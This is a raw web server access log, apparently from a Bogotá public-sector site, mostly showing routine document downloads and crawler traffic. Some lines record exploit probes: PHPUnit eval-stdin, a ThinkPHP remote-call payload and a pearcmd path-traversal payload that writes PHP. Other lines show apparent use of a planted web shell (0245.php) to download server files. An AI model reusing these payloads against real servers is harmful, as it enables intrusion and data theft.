82.197.71.235 - - [04/Jul/2024:08:52:30 -0500] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
201.245.192.253 - - [04/Jul/2024:08:52:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
82.197.71.235 - - [04/Jul/2024:08:52:30 -0500] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:31 -0500] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:31 -0500] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:31 -0500] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:32 -0500] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:32 -0500] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:33 -0500] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:33 -0500] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:34 -0500] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:34 -0500] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:35 -0500] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:35 -0500] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:35 -0500] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 1018
190.24.48.73 - - [04/Jul/2024:08:53:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/4058.pdf HTTP/1.1" 200 330193
190.24.48.73 - - [04/Jul/2024:08:53:06 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
192.133.77.14 - - [04/Jul/2024:08:53:12 -0500] "GET /images/presentaci%C3%B3n%20convenci%C3%B3n.jpg HTTP/1.1" 404 1034
192.133.77.18 - - [04/Jul/2024:08:53:13 -0500] "GET /bogota-lista-para-ser-la-sede-de-la-ii-convencion-internacional-de-emergencia-climatica.html HTTP/1.1" 200 934
66.249.73.37 - - [04/Jul/2024:08:53:19 -0500] "GET /Publicaciones/2024EE139493.pdf HTTP/1.1" 200 241736
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 27040
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
186.86.32.192 - - [04/Jul/2024:08:53:21 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [04/Jul/2024:08:53:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:08:53:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
66.249.73.36 - - [04/Jul/2024:08:53:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201751-1800/00001782.tif HTTP/1.1" 200 144696
157.55.39.204 - - [04/Jul/2024:08:53:57 -0500] "GET /Publicaciones/2024EE122445.pdf HTTP/1.1" 404 228
201.245.192.253 - - [04/Jul/2024:08:54:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.73.37 - - [04/Jul/2024:08:54:19 -0500] "GET /BLA/resoluciones/AUTOS%202023/2463.pdf HTTP/1.1" 304 -
66.249.73.36 - - [04/Jul/2024:08:54:20 -0500] "GET /Publicaciones/2024EE55559.pdf HTTP/1.1" 404 227
66.249.73.36 - - [04/Jul/2024:08:54:20 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/00296.pdf HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:08:54:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:08:55:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.111.3 - - [04/Jul/2024:08:55:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=5797.pdf&ft=download HTTP/1.1" 200 229031
201.245.192.253 - - [04/Jul/2024:08:56:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.116.41 - - [04/Jul/2024:08:56:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin&f=admin-functions.php&ft=download HTTP/1.1" 200 403
201.245.192.253 - - [04/Jul/2024:08:56:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.30.234 - - [04/Jul/2024:08:56:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2229.pdf&ft=download HTTP/1.1" 200 372391
172.22.2.4 - - [04/Jul/2024:08:54:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.56.255 - - [04/Jul/2024:08:56:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1623.pdf&ft=download HTTP/1.1" 200 433831
47.128.40.79 - - [04/Jul/2024:08:57:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=2200.pdf&ft=download&white=1 HTTP/1.1" 200 35086
216.245.221.92 - - [04/Jul/2024:08:57:13 -0500] "HEAD / HTTP/1.1" 200 -
36.156.22.4 - - [04/Jul/2024:08:57:13 -0500] "GET / HTTP/1.0" 200 319
36.156.22.4 - - [04/Jul/2024:08:57:14 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
36.156.22.4 - - [04/Jul/2024:08:57:15 -0500] "GET /robots.txt HTTP/1.1" 404 1018
36.156.22.4 - - [04/Jul/2024:08:57:16 -0500] "GET /.well-known/security.txt HTTP/1.1" 404 1018
47.128.20.253 - - [04/Jul/2024:08:57:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=Los-humedales-Bogota.flv&ft=download&white=1 HTTP/1.1" 200 15765141
172.22.2.4 - - [04/Jul/2024:08:55:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [04/Jul/2024:08:57:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.36.11 - - [04/Jul/2024:08:57:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages&f=page78.swf&ft=download HTTP/1.1" 200 20134
190.145.70.161 - - [04/Jul/2024:08:57:41 -0500] "GET /BLA/resoluciones/AUTOS%202014/4212.pdf HTTP/1.1" 206 1
